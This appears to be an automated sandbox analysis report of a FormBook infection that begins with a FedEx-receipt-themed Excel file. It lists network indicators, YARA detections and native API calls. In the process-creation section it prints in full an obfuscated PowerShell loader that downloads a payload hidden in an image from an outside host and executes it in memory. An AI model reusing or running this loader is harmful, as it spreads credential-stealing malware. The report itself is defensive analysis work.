Source: global traffic	HTTP traffic detected: GET /Users_API/syscore/file_m0veebx3.y4i.txt HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 41.216.183.13

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 194.163.41.117:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49176 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 194.163.41.117:443 -> 192.168.2.22:49179 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.95.235.16

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 7_2_036407AB URLDownloadToFileW,ShellExecuteW,ExitProcess,

7_2_036407AB

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B654C9D0.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /BrlcB HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ilang.inConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /88077/ima/ima.imim.im.imim.doC HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /88077/imagesofrosepetelflowerstogetitgreat.gif HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.16Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Users_API/syscore/file_m0veebx3.y4i.txt HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 41.216.183.13
Source: global traffic	HTTP traffic detected: GET /88077/BNNJ.txt HTTP/1.1Host: 23.95.235.16Connection: Keep-Alive

Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: ilang.in
Source: global traffic	DNS traffic detected: DNS query: uploaddeimagens.com.br

Source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.479671681.0000000006221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16
Source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.479671681.0000000006221000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/88077/BNNJ.txt
Source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/88077/BNP
Source: EQNEDT32.EXE, 00000007.00000002.455223892.00000000005F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/88077/imagesofrosepetelflowerstogetitgreat.gif
Source: EQNEDT32.EXE, 00000007.00000002.455415993.0000000003640000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.95.235.16/88077/imagesofrosepetelflowerstogetitgreat.gifj
Source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.95.24
Source: wscript.exe, 00000009.00000002.481524430.0000000000697000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.183.13/Users_API/syscore/file_B
Source: wscript.exe, 00000009.00000002.481524430.0000000000697000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481376582.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481166475.00000000004AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481370525.000000000049F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481299140.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, magesofrosepetelflowerstogetitgrea.vBS.7.dr, imagesofrosepetelflowerstogetitgreat[1].gif.7.dr	String found in binary or memory: http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txt
Source: wscript.exe, 00000009.00000003.480557490.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481408431.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481147687.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481281597.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481123191.00000000004D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txtr
Source: wscript.exe, 00000009.00000003.480862214.00000000004EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.480557490.00000000004EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.481272894.00000000004EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.481430080.00000000004EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://41.216.183.13/Users_API/syscore/file_m0veebx3.y4i.txtz
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: ilang.in.url.4.dr	String found in binary or memory: http://ilang.in/
Source: FedEx Receipt_53065724643.xls, BrlcB.url.4.dr	String found in binary or memory: http://ilang.in/BrlcB
Source: B9930000.0.dr, ~DF189859C23F2234A3.TMP.0.dr	String found in binary or memory: http://ilang.in/BrlcByX
Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 0000000A.00000002.474007800.0000000002611000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.474728665.0000000003639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000A.00000002.479498766.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 0000000A.00000002.474007800.0000000002749000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 0000000A.00000002.474007800.0000000002749000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235
Source: powershell.exe, 0000000A.00000002.474007800.0000000002749000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4;

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DD4612E1.doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ima.imim.im.imim[1].doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen

Excel sheet contains many unusual embedded objects

Source: FedEx Receipt_53065724643.xls	OLE: Microsoft Excel 2007+
Source: FedEx Receipt_53065724643.xls	OLE: Microsoft Excel 2007+
Source: ~DFE1D622D06AD63FEF.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: ~DF5C7C8EE0310B7690.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: B9930000.0.dr	OLE: Microsoft Excel 2007+
Source: B9930000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\BrlcB.url			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ilang.in.url			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Server XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{AFBA6B42-5692-48EA-8141-DC517DCF0EF1}\ProgID	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\ProgID	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)\| IEx"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)\| IEx"			Jump to behavior

Abnormal high CPU Usage

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process Stats: CPU usage > 49%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0042B243 NtClose,	12_2_0042B243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023907AC NtCreateMutant,LdrInitializeThunk,	12_2_023907AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FAE8 NtQueryInformationProcess,LdrInitializeThunk,	12_2_0238FAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FB68 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_0238FB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238F9F0 NtClose,LdrInitializeThunk,	12_2_0238F9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FDC0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_0238FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02390078 NtResumeThread,	12_2_02390078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02390060 NtQuerySection,	12_2_02390060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02390048 NtProtectVirtualMemory,	12_2_02390048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023900C4 NtCreateFile,	12_2_023900C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0239010C NtOpenDirectoryObject,	12_2_0239010C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023901D4 NtSetValueKey,	12_2_023901D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02390C40 NtGetContextThread,	12_2_02390C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023910D0 NtOpenProcessToken,	12_2_023910D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02391148 NtOpenThread,	12_2_02391148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FA20 NtQueryInformationFile,	12_2_0238FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FA50 NtEnumerateValueKey,	12_2_0238FA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FAB8 NtQueryValueKey,	12_2_0238FAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FAD0 NtAllocateVirtualMemory,	12_2_0238FAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FB50 NtCreateKey,	12_2_0238FB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FBB8 NtQueryInformationToken,	12_2_0238FBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FBE8 NtQueryVirtualMemory,	12_2_0238FBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238F8CC NtWaitForSingleObject,	12_2_0238F8CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238F938 NtWriteFile,	12_2_0238F938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02391930 NtSetContextThread,	12_2_02391930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238F900 NtReadFile,	12_2_0238F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FE24 NtWriteVirtualMemory,	12_2_0238FE24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FEA0 NtReadVirtualMemory,	12_2_0238FEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FED0 NtAdjustPrivilegesToken,	12_2_0238FED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FF34 NtQueueApcThread,	12_2_0238FF34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FFB4 NtCreateSection,	12_2_0238FFB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FFFC NtCreateProcessEx,	12_2_0238FFFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FC30 NtOpenProcess,	12_2_0238FC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FC60 NtMapViewOfSection,	12_2_0238FC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FC48 NtSetInformationFile,	12_2_0238FC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FC90 NtUnmapViewOfSection,	12_2_0238FC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FD5C NtEnumerateKey,	12_2_0238FD5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0238FD8C NtDelayExecution,	12_2_0238FD8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02391D80 NtSuspendThread,	12_2_02391D80

Detected potential crypto function

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0041681F	12_2_0041681F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00416823	12_2_00416823
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00403180	12_2_00403180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_004101A3	12_2_004101A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_0040E223	12_2_0040E223
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00402C70	12_2_00402C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00401C23	12_2_00401C23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00401C30	12_2_00401C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00402500	12_2_00402500
